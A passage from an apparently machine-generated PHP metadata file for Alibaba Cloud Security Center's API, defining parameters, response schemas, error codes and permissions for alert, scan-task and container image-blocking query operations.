=> 'string', 'example' => '[100,1]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ModuleCode\\": \\"vulFix\\",\\n \\"CanTry\\": false,\\n \\"TrialRecordList\\": [\\n {\\n \\"ModuleCode\\": \\"vulFix\\",\\n \\"AuthLimit\\": 100,\\n \\"GmtStart\\": 1669824000000,\\n \\"GmtEnd\\": 1679760000000,\\n \\"Status\\": 1,\\n \\"AuthLimitList\\": \\"[100,1]\\"\\n }\\n ]\\n },\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', 'title' => 'GetModuleTrialAuthInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleTrialAuthInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetModuleTrialAuthInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetObjectScanEvent' => [ 'summary' => 'Retrieves the details of an alert event that is generated for a malicious object.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.', 'type' => 'string', 'required' => false, 'example' => '81****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" ."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], 'Data' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'FileName' => ['description' => 'The name of the object.', 'type' => 'string', 'example' => 'sca_2023****', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the object.', 'type' => 'string', 'example' => '0552c44e243abdea1729d4507bce****', 'title' => ''], 'EventName' => ['description' => 'The name of the alert item.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'Details' => [ 'description' => 'The details of the alert event.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'InfoType' => ['description' => 'The type of the item.', 'type' => 'string', 'example' => 'html', 'title' => ''], 'Name' => ['description' => 'The name of the item.', 'type' => 'string', 'example' => 'DownloadUrl。', 'title' => ''], 'NameDisplay' => ['description' => 'The display name of the item.', 'type' => 'string', 'example' => 'DownloadUrl。', 'title' => ''], 'Type' => ['description' => 'The type of the item.', 'type' => 'string', 'example' => 'html', 'title' => ''], 'Value' => ['description' => 'The value of the item.', 'type' => 'string', 'example' => 'http://****', 'title' => ''], 'ValueDisplay' => ['description' => 'The display value of the item.', 'type' => 'string', 'example' => 'http://****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\",\\n \\"Data\\": {\\n \\"FileName\\": \\"sca_2023****\\",\\n \\"Md5\\": \\"0552c44e243abdea1729d4507bce****\\",\\n \\"EventName\\": \\"WebShell\\",\\n \\"Details\\": [\\n {\\n \\"InfoType\\": \\"html\\",\\n \\"Name\\": \\"DownloadUrl。\\",\\n \\"NameDisplay\\": \\"DownloadUrl。\\",\\n \\"Type\\": \\"html\\",\\n \\"Value\\": \\"http://****\\",\\n \\"ValueDisplay\\": \\"http://****\\"\\n }\\n ]\\n }\\n}","type":"json"}]', 'title' => 'GetObjectScanEvent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetObjectScanEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetObjectScanEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOnceTaskResultInfo' => [ 'summary' => 'Queries the execution results of a one-time scan task, such as an asset fingerprint collection task, a vulnerability scan, or an image security scan.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92308', 'abilityTreeNodes' => ['FEATUREsas36IOGX', 'FEATUREsasLFD8D4'], ], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The type of the task. Valid values:'."\n" ."\n" .'- **CLIENT\\_PROBLEM\\_CHECK**: client troubleshooting task'."\n" ."\n" .'- **CLIENT\\_DEV\\_OPS**: cloud O\\&M task'."\n" ."\n" .'- **ASSET\\_SECURITY\\_CHECK**: asset collection task'."\n" ."\n" .'- **ASSETS\\_COLLECTION**: asset fingerprint collection task'."\n" ."\n" .'- **IMAGE\\_SCAN**: container image scan task'."\n" ."\n" .'- **AI\\_SECURITY\\_CHECK**: AI asset synchronization task'."\n" ."\n" .'- **IDC\\_PROBE\\_SCAN**: IDC probe scan task'."\n" ."\n" .'- **ATTACK\\_SURFACE\\_SCAN**: attack surface and boundary asset scan task'."\n" ."\n" .'- **ASSET\\_EXPOSURE\\_SCAN**: asset exposure scan task'."\n" ."\n" .'- **VUL\\_CHECK\\_TASK**: vulnerability scan task', 'type' => 'string', 'required' => true, 'example' => 'ASSETS_COLLECTION', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The name of the task. Valid values:'."\n" ."\n" .'- **CLIENT\\_PROBLEM\\_CHECK**: client troubleshooting task'."\n" ."\n" .'- **CLIENT\\_DEV\\_OPS**: cloud O\\&M task'."\n" ."\n" .'- **ASSET\\_SECURITY\\_CHECK**: asset collection task'."\n" ."\n" .'- **ASSETS\\_COLLECTION**: asset fingerprint collection task'."\n" ."\n" .'- **IMAGE\\_SCAN**: container image scan task'."\n" ."\n" .'- **AI\\_SECURITY\\_CHECK**: AI asset synchronization task'."\n" ."\n" .'- **IDC\\_PROBE\\_SCAN**: IDC probe scan task'."\n" ."\n" .'- **ATTACK\\_SURFACE\\_SCAN**: attack surface and boundary asset scan task'."\n" ."\n" .'- **ASSET\\_EXPOSURE\\_SCAN**: asset exposure scan task'."\n" ."\n" .'- **VUL\\_CHECK\\_TASK**: vulnerability scan task', 'type' => 'string', 'required' => true, 'example' => 'ASSETS_COLLECTION', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the one-time task.', 'type' => 'string', 'required' => true, 'example' => '9dfa3a7eb9547781632785b49003****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CollectTime' => ['description' => 'The time when the task was executed.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671184531000', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. This uniquely identifies the request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], 'TaskId' => ['description' => 'The ID of the one-time task.', 'type' => 'integer', 'format' => 'int64', 'example' => 'e7b70a4b030db086db52231f1b58****', 'title' => ''], 'FinishCount' => ['description' => 'The number of tasks that have been completed.', 'type' => 'integer', 'format' => 'int32', 'example' => '47', 'title' => ''], 'TaskInfo' => [ 'description' => 'Details of the task.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the task. Valid values:'."\n" ."\n" .'- **INIT**: The task is pending start.'."\n" ."\n" .'- **START**: The task is running.'."\n" ."\n" .'- **SUCCESS**: The task is completed.'."\n" ."\n" .'- **TIMEOUT**: The task has timed out.', 'type' => 'string', 'example' => 'START', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CollectTime\\": 1671184531000,\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"TotalCount\\": 44,\\n \\"TaskId\\": 0,\\n \\"FinishCount\\": 47,\\n \\"TaskInfo\\": {\\n \\"Status\\": \\"START\\"\\n }\\n}","type":"json"}]', 'title' => 'GetOnceTaskResultInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOnceTaskResultInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:GetOnceTaskResultInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaClusterBaseLineList' => [ 'summary' => 'Queries the baselines that are supported by at-risk image blocking.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about baselines.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClassKey' => ['description' => 'The key of the baseline type.'."\n", 'type' => 'string', 'example' => 'identification', 'title' => ''], 'NameKey' => ['description' => 'The key of the name for the baseline.'."\n", 'type' => 'string', 'example' => 'identification', 'title' => ''], 'ItemKey' => ['description' => 'The key of the name for the baseline check item.'."\n", 'type' => 'string', 'example' => 'duplicate_uid', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline.'."\n", 'type' => 'string', 'example' => 'Make sure there are no duplicate usernames or UIDs', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'C2F2A020-1CAB-5F52-8CAF-B2ACDDFAC247', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"ClassKey\\": \\"identification\\",\\n \\"NameKey\\": \\"identification\\",\\n \\"ItemKey\\": \\"duplicate_uid\\",\\n \\"Alias\\": \\"Make sure there are no duplicate usernames or UIDs\\"\\n }\\n ],\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"C2F2A020-1CAB-5F52-8CAF-B2ACDDFAC247\\"\\n}","type":"json"}]', 'title' => 'GetOpaClusterBaseLineList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterBaseLineList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaClusterBaseLineList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaClusterImageList' => [ 'summary' => 'Get cluster image information.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'ImageName', 'in' => 'query', 'schema' => ['description' => 'The name of the image.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testImage', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster to which the container belongs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c4af4fdf38a98496a9b63c2be5dae****', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The number of entries per page. Default value: **20**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The page number. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the images.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ImageName' => ['description' => 'The name of the image.'."\n", 'type' => 'string', 'example' => 'opa-test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of images returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code 200 indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0D02F593-2050-5F5D-8C98-D965FF1B461D', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"ImageName\\": \\"opa-test\\"\\n }\\n ],\\n \\"Count\\": 1,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"0D02F593-2050-5F5D-8C98-D965FF1B461D\\"\\n}","type":"json"}]', 'title' => 'Get Cluster Image Information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterImageList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaClusterImageList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaClusterLabelList' => [ 'summary' => 'Retrieves information about the tags that are added to containers based on the feature of proactive defense for containers.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TagName', 'in' => 'query', 'schema' => ['description' => 'The name of the tag.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster to which the container belongs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to query the IDs of clusters.', 'type' => 'string', 'required' => false, 'example' => 'c556c8133b5ad4378b7fc533ddbda****', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 200. If you leave the PageSize parameter empty, 200 entries are returned by default. Maximum value: 200.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '20'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '1'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the tags that are added to containers.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'TagName' => ['description' => 'The name of the tag that is added to the container.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '95D35EB3-1F8E-5E07-A68E-BE018C9B80CB', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"TagName\\": \\"test\\"\\n }\\n ],\\n \\"Count\\": 2,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"95D35EB3-1F8E-5E07-A68E-BE018C9B80CB\\"\\n}","type":"json"}]', 'title' => 'GetOpaClusterLabelList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterLabelList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaClusterLabelList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaClusterNamespaceList' => [ 'summary' => 'Retrieves information about the namespaces of clusters for which the rules of the at-risk image blocking type are configured in proactive defense for containers.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'NameSpaceName', 'in' => 'query', 'schema' => ['description' => 'The name of the namespace.', 'type' => 'string', 'required' => false, 'example' => 'sit', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster that you want to query.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.', 'type' => 'string', 'required' => false, 'example' => 'ca0faf43e33904ecbb6c695df7906****', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '20'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '1'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The namespaces.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'NameSpaceName' => ['description' => 'The name of the namespace.', 'type' => 'string', 'example' => 'testNameSpace', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '384BFAF1-FC41-58DD-97DD-9D361ADF377D', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"NameSpaceName\\": \\"testNameSpace\\"\\n }\\n ],\\n \\"Count\\": 0,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"384BFAF1-FC41-58DD-97DD-9D361ADF377D\\"\\n}","type":"json"}]', 'title' => 'GetOpaClusterNamespaceList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterNamespaceList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaClusterNamespaceList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaPluginStatus' => [ 'summary' => 'Queries the installation status of the components that are required for clusters protected by proactive defense for containers.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterIds', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'description' => 'The cluster IDs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'array', 'items' => ['description' => 'The cluster ID.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c60b77fe62093480db6164a3c2fa****', 'title' => ''], 'required' => true, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F'], 'InstallStatus' => [ 'description' => 'The installation status of the components that are required for clusters protected by proactive defense for containers.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.'."\n", 'type' => 'string', 'example' => 'c60b77fe62093480db6164a3c2fa****', 'title' => ''], 'InstallStatus' => ['description' => 'Indicates whether the component is installed. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\",\\n \\"InstallStatus\\": [\\n {\\n \\"ClusterId\\": \\"c60b77fe62093480db6164a3c2fa****\\",\\n \\"InstallStatus\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'GetOpaPluginStatus', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaPluginStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetOpaPluginStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetOpaStrategyDetailNew' => [ 'summary' => 'Retrieves the details of the rule that is used to block at-risk images.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" ."\n" .'> You can call the [ListOpaClusterStrategyNew](~~2623574~~) operation to query the rule ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1349', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'StrategyId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1005', 'title' => ''], 'StrategyTemplateId' => ['description' => 'The ID of the rule template.', 'type' => 'integer', 'format' => 'int64', 'example' => '1204', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'StrategyName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test001', 'title' => ''], 'Description' => ['description' => 'The description.', 'type' => 'string', 'example' => 'Custom defense configuration', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'UnScanedImage' => ['description' => 'Indicates whether the rule supports unscanned images. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'MaliciousImage' => ['description' => 'Indicates whether the rule supports malicious Internet images. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ImageName' => [ 'description' => 'The 